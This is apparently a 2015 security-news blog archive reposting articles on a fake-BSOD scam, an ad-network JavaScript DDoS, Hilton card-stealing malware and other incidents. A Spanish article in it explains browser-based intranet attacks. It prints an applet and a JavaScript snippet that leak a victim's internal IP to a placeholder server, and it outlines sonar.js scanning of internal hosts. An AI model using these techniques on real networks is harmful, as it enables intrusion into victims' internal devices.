Month: September 2015

Novel malware dupes victims with fake blue screen of death

Posted on

bsod

Malware creators are hijacking Microsoft Windows’ infamous BSOD in a fresh malvertising campaign.

A new malvertising campaign uses the Blue Screen of Death to scam users into handing over their money and potentially their identity.

Online search engines are used daily by millions of web users. In order to support the vast amounts of requests these search engines receive and process, search engine providers — such as Google, Yahoo and Microsoft — offer advertising platforms and packages for businesses. Users view sponsored links placed high up on a search results page, businesses gain more exposure and the search engine generates revenue.

However, search engine advertising is also a place ripe for exploit and is being used by cyberattackers in order to generate their own revenue. One of the most commonly-known techniques include setting up malicious domains which deliver malware payloads to victim machines — resulting in slave systems, compromised PCs and data theft. Some attackers also set up fraudulent domains which appear legitimate in order to lure victims to input their account information.

Unfortunately, many online advertisement schemes run through third-party platforms and sometimes threat actors slip through the net — resulting in fraudulent and malicious links being displayed on legitimate, trustworthy domains.

Now, a new and rather novel campaign has attracted cybersecurity firm Malwarebytes’ attention.

In a blog post on Monday, the team at Malwarebytes revealed their findings on a new malvertising campaign which uses the infamous Microsoft Windows’ Blue Screen of Death (BSOD) as its selling point.

The group uses BSOD to reel in potential victims as a social engineering technique. The security company found attackers bidding on popular phrases through Google’s AdWords advertising space, including the YouTube keyword to display their adverts at the top of the search engine. This link is meant to go to the designated YouTube URL, but instead, clicking on this advert leads to a convincing web page complete with the BSOD image.

While some users will not be fooled, others without much technical knowledge are likely to be.

bsod_

On the page, users are instructed to call a toll-free “helpline” to resolve the BSOD issue. The scammers are waiting at the other end for these calls, where they pretend to be Windows support and offer their victims expensive and non-existent “support packages” — defrauding users of anything from $199 to $599.

However, this isn’t necessary the end of a painful story. Malwarebytes says innocent PC users may also end up having their identity stolen and bank accounts rinsed of funds.

In this particular campaign, at least two domains have been registered to redirect users to the fraudulent pages through IP addresses in Arizona.

The campaign was reported to Google and the adverts were immediately pulled, but this is is only one such campaign out of thousands of scams appearing every day online.

Source:http://www.zdnet.com/

¿CÓMO HACKEAR Y EXPLOTAR LA RED INTERNA Y IPS PRIVADAS?

Posted on

FTP

Según una encuesta por empresa de seguridad informática, la mayoría de las personas creen que mientras se navegan por la Web que están protegidas por firewalls y redes aisladas a través de direcciones privadas del IP NAT. Con este entendimiento, asumimos la seguridad de los sitios web de intranet y las interfaces basadas en routers, cortafuegos, impresoras, teléfonos IP, sistemas de nómina, etc., aunque dejamos sin parchear. Pensamos que permanecen seguro dentro de la zona protegida y nada es capaz de conectar directamente desde el mundo exterior, ¿no?

Bueno, no del todo. Navegadores web pueden ser completamente controlados por cualquier página web, lo que les permite atacar los recursos de la red interna acuerdo con profesores de formación de hacking ético. La navegador web de cada usuario en una red empresarial se puede cambiar en un trampolín para los intrusos sin soluciones de seguridad perimetral avanzados.

Cómo alguien puede explotar la red interna

Un experto de empresa de seguridad informática explica los procedimientos para explotar la red interna:

  • Una víctima visita una página web maliciosa, que asume el control de su navegador Web. La página web maliciosa podría ser cualquiera página web, atada con un ataque XSS permanente que hackers están siendo aprovechado para la entrega de malware masivo.
  • Cuando se ejecuta el malware, lo hace desde la perspectiva de la intranet de la víctima, donde nadie puede acceder directamente. Esto quiere decir que el navegador web de la víctima puede ser instruido para entregar su dirección de NAT IP y hacer conexiones en la red interna en nombre del atacante o víctima.
  • El malware utiliza navegador web de la víctima como una plataforma de lanzamiento, donde el malware hace los análisis de puertos, fingerprinting de los servidores web en la red interna y revisa las soluciones de seguridad perimetral implementadas.
  • El malware se inicia los ataques contra los objetivos internos y la información comprometida se envía fuera de la red para la colección.

Es fácil a obtener la dirección IP pública de un navegador web desde el servidor web, pero la dirección IP interna es poco difícil menciona profesores de formación de hacking ético. Esta es la pieza de información que necesitamos para comenzar a explorar y explotar intranet. Para obtener IP interna, tenemos que invocar Java en un navegador y un applet. Eso es una forma sencilla de hacerlo. El siguiente código carga el MyAddress.class y luego abre la URL de

http://webserver/dirección_ip.html?nat = XXXX

<APPLET CODE=”MyAddress.class”>

<PARAM NAME=”URL” VALUE=”http://webserver/ip_address.html?nat=”>

</APPLET>

Si el navegador web de la víctima es una Mozilla / Firefox, es posible omitir el requisito subprograma e invocar una socket de Java directamente desde el JavaScript.

function natIP() {

var w = window.location;

var host = w.host;

var port = w.port || 80;

var Socket = (new

java.net.Socket(host,port)).getLocalAddress().getHostAddress();

return Socket;

}

Framework para explotar la red interna

Sonar

Sonar.js es un marco que utiliza JavaScript, WebRTC, y algunas funciones onload para detectar dispositivos internos en una red. sonar.js funciona mediante la utilización WebRTC para enumerar hosts en vivo en la red interna. Mike Stevans profesor de formación de hacking ético explica que tras enumerar las direcciones internas sonar.js intenta vincular a los recursos estáticos como CSS, imágenes y JavaScript, mientras que conecta el controlador de eventos onload. Si carga los recursos con éxito e inicia el evento onload entonces sabemos que el anfitrión tiene este recurso.

¿Por qué es útil saber? Al obtener una lista de los recursos alojados en un dispositivo, podemos intentar hacer fingerprinting de los dispositivos y soluciones de seguridad perimetral.

Sonar js
Sonar js

¿Cómo funciona Sonar?

Al cargar payload de sonar.js en un navegador web moderno sucederá lo siguiente:

  • sonar.js utilizará WebRTC para enumerar lo IPs internas que tiene el usuario
  • sonar.js luego intenta encontrar otros hosts en vivo de la red interna a través de webSockets.
  • Si no se encuentra una gran cantidad en vivo, sonar.js comienza a intentar hacer fingerprinting mediante la vinculación a ella a través de

<img src=”x”> and <link rel=”stylesheet” type=”text/css” href=”x”>

y enganchar el proceso de onload. Si el recurso carga con éxito se activará un evento para lanzar el exploit acuerdo con resultados de fingerprinting.

Sonar.js trabaja sobre una base de datos de fingerprints. Fingerprint es simplemente una lista de los recursos conocidos en una red que se pueden vincular a y detectados a través onload. Ejemplos de esto incluyen imágenes, hojas de CSS style, e incluso JavaScript externo.

Sonar-chrome
Sonar-chrome

Acuerdo con expertos de empresa de seguridad informática, mediante la creación de sus propias fingerprints se puede construir exploits personalizados que serán lanzadas contra los dispositivos internos una vez que son detectados por sonar.js. Exploits comunes incluyen cosas como la Cross-site Request Forgery (CSRF), Cross-site Scripting (XSS), etc. La idea es que usted puede utilizar estas vulnerabilidades para hacer cosas tales como modificar configuraciones DNS del router, el sacar archivos desde un servidor de archivos interno, y más.

Mediante el uso de sonar.js pentesting puede construir exploits contra los servidores internos de registro, routers, impresoras, teléfonos VOIP, y más menciona expertos de soluciones de seguridad perimetral . Debido a las redes internas a menudo están menos vigiladas, ataques como CSRF y XSS pueden ser de gran alcance para hacerse cargo de las configuraciones de los dispositivos internos de una red.

Fuente:http://noticiasseguridad.com/tecnologia/como-hackear-y-explotar-la-red-interna-y-ips-privadas/

JavaScript DDoS Attack Peaks at 275,000 Requests-Per-Second

Posted on

Two years ago at the Black Hat conference, WhiteHat Security researchers Jeremiah Grossman and Matt Johansen explained how hackers could in theory leverage an online ad network to distribute malicious JavaScript efficiently and quickly.

Depending on how much money the attacker wanted to spend, they could do just about anything from drive-by download attacks, to search engine poisoning to DDoS attacks.

“For a DDoS attack, for mere dollars we could bring down one Apache server very quickly for probably under $10 and hold it down for a long time,” Grossman told Threatpost in 2013. “I don’t know if it has good DDoS protection how much it would cost us, but it probably wouldn’t cost $100. This means that anyone without DDoS protection is susceptible to a $10 attack that could bring them down.”

Using JavaScript to bring down a target has slowly moved out of the theoretical, given the Great Cannon research done earlier this year by Citizen Lab and a JavaScript-based DDoS attack against 8chan that originated in malicious image files hosted on Imgur. CloudFlare on Friday described a voluminous attack against an unnamed customer that it speculates could have been launched using a mobile ad network.

JavaScript DDoS Attack Peaks at 275,000 Requests-Per-Second

Researcher Marek Majkowski said the flood attacks peaked at 275,000 HTTP requests per second close to 1.2 billion requests per hour during a four-hour span. Most of the requests came from mobile browsers based in China.

“There is no way to know for sure why so many mobile devices visited the attack page, but the most plausible distribution vector seems to be an ad network,” Majkowski wrote. “It seems probable that users were served advertisements containing the malicious JavaScript. [These] ads were likely showed in iframes in mobile apps, or mobile browsers to people casually browsing the internet.”

Majkowski said this was not a packet-injection type of attack. Instead it’s likely, users’ mobile browsers were served iframes with ads requested from a mobile ad network. The networks forwarded the requests to the malicious third parties which won the real-time bidding for the slot. The user was served a page containing malicious JavaScript that sent a flood of XHR requests against the targeted website, CloudFlare said.

“It seems the biggest difficulty is not in creating the JavaScript — it is in effectively distributing it. Since an efficient distribution vector is crucial in issuing large floods, up until now I haven’t seen many sizable browser-based floods,” Majkowski said. “Attacks like this form a new trend. They present a great danger in the internet — defending against this type of flood is not easy for small website operators.”

Source:https://threatpost.com

iPhone can be Hacked if within Bluetooth Range

Posted on

It has been reported that a vulnerability in iPhones means that a hacker can wirelessly hijack your iPhone if they are within Bluetooth range. Australian security researcher and consultant Mark Dowd revealed that iOS 9 includes a patch for this security vulnerability, which he warned Apple about just over a month ago. Tim Erlin, director of security and product management at Tripwire commented on hacking iphone within the bluetooth range.

Tim Erlin, Director of Security and Product Management at Tripwire :

iPhone can be Hacked if within Bluetooth Range
iPhone can be Hacked if within Bluetooth Range

“Vulnerabilities like this one should remind users of the importance of keeping your systems current with security updates. Unfortunately, those who would most benefit from hearing this advice are also the hardest to reach. There’s no doubt that this vulnerability will persist and be exploited on devices that aren’t updated.”

Tripwire is a leading provider of advanced threat, security and compliance solutions that enable enterprises, service providers and government agencies to confidently detect, prevent and respond to cybersecurity threats. Tripwire solutions are based on high-fidelity asset visibility and deep endpoint intelligence combined with business-context and enable security automation through enterprise integration. Tripwire’s portfolio of enterprise-class security solutions includes configuration and policy management, file integrity monitoring,vulnerability management and log intelligence.

Soruce:http://www.informationsecuritybuzz.com/

Hilton hotels in credit-card-stealing malware infection scare

Posted on

Someone has hacked the Hilton’s sales registers, and made off with guests’ credit-card details, it’s claimed. The hotel chain confirmed today it is investigating the alleged breach of its computer security.

Investigative journo Brian Krebs says malware in point-of-sale (POS) terminals is believed to have nicked the card information, some of which is already being used to make fraudulent transactions, we’re told.

Multiple sources have told Krebs that bank staff have traced the misused cards to a common source: the tills at restaurants and gift shops in various Hilton hotels around the US.

It is not clear how many accounts may have been compromised, but the malware was active from April 21 to July 27 of this year, apparently. Visa reportedly issued a security alert on the security breach back in August.

Hilton hotels in credit-card-stealing malware infection scare
Hilton hotels in credit-card-stealing malware infection scare

Sales terminals in Doubletree, Embassy Suites, Hampton, and Waldorf Astoria hotels were also compromised, it is claimed.

A Hilton spokesperson told The Register late on Friday afternoon:

Hilton Worldwide is strongly committed to protecting our customers’ credit card information. We have many systems in place and work with some of the top experts in the field to address data security. Unfortunately the possibility of fraudulent credit card activity is all too common for every company in today’s marketplace. We take any potential issue very seriously, and we are looking into this matter.

If Krebs’ sources are on the money, Hilton will be the latest major American chain to suffer a massive credit card security breach as the result of a malware incursion. Criminals typically plant malware on PC-like tills to collect credit card information when a purchase is made, and then siphon off the numbers.

Source:http://www.theregister.co.uk/

Russian firm tasked with cracking Tor throws in towel

Posted on

The company hired by the Kremlin to gather information on and crack the anonymous browser Tor is now looking to pay more than the contract’s value in legal fees to back out of the agreement, according to Bloomberg.

Last year, Russia’s Interior Ministry offered a contract, then worth approximately $110,000, “to study the possibility of obtaining technical information on users and users’ equipment of Tor anonymous network,” in an attempt to crack the anonymity offered by the network.

A Russian firm tasked with gathering information on Tor users is paying more than the value of the contract to back out of the agreement.
A Russian firm tasked with gathering information on Tor users is paying more than the value of the contract to back out of the agreement.

The Central Research Institute of Economics, Informatics, and Control Systems, a state-run maker of helicopters, weapons, and other military and industrial equipment, accepted the contract.

The firm was not able to hack into the browser, according to online Russian news site Meduza.

Documents obtained from a database of state-purchased disclosures revealed the company agreed to pay $150,000 in legal fees to abandon the Tor project and several other classified government contracts, according to the Bloomberg report.

Lawyers from Pleshakov, Ushkalov and Partners are negotiating with Russian officials to help the firm reach a settlement.

Source:http://www.scmagazine.com/

Facebook Following NSA Footsteps to Spy on Users: Belgium’s Privacy Advocate

Posted on

In June this year, we reported how Facebook was sued by Belgium’s Privacy Commission (BPC) fortracking users even those who never made a profile on the social media site.

Now, Frederic Debussere (representative of the Belgian Privacy Commission/BPC) in his opening arguments on Monday, referred to Edward Snowden, the famous NSA whistleblower, while revealing the mass surveillance program of theNSA.

He said:

“WHEN IT BECAME KNOWN THAT THE NSA WAS SPYING ON PEOPLE ALL AROUND THE WORLD, EVERYBODY WAS UPSET. THIS ACTOR [FACEBOOK] IS DOING THE VERY SAME THING, ALBEIT IN A DIFFERENT WAY.”

Detailed Analysis:

The BPC accused Facebook of “trampling” over European and Belgian privacy law and brought a lawsuit against the social network.

Facebook Following NSA Footsteps to Spy on Users: Belgium’s Privacy Advocate

The details of the alleged breaches from Facebook can be found in a report from the BPC, in which the commission mentioned that Facebook tracked non-users and those who already had logged out from the site for advertising purposes.

Reportedly, Facebook is being threatened by the BPC for a fine of $250,000 per day for not responding to its demands.

The Cookie Aspect:

Facebook has categorically denied the claims and states that the data and information presented by the BPC in its privacy report are false.

According to an official Facebook spokesperson the social network is adamant to “show the court how this technology protects people from spam, malware, and other attacks, that our practices are consistent with EU law and with those of the most popular Belgian websites,” according to the Guardian.

Moreover, Facebook repeatedly has mentioned that all of its operations and practices in European regions are audited and controlled under the Irish data protection agency. The headquarters of Facebook’s European branch is also situated in Dublin, Ireland.

A representative of Facebook, Paul Lefebvre said:

“How could Facebook be subject to Belgian law if the management of data gathering is being done by Facebook Ireland and its 900 employees in that country?”

Belgians need not to ‘be intimidated’ by Facebook:

The whole of Europe is watching the case intently since data privacy regulators throughout the region, even in the Netherlands, have started to point fingers at the privacy practices of Facebook.

Source:https://www.hackread.com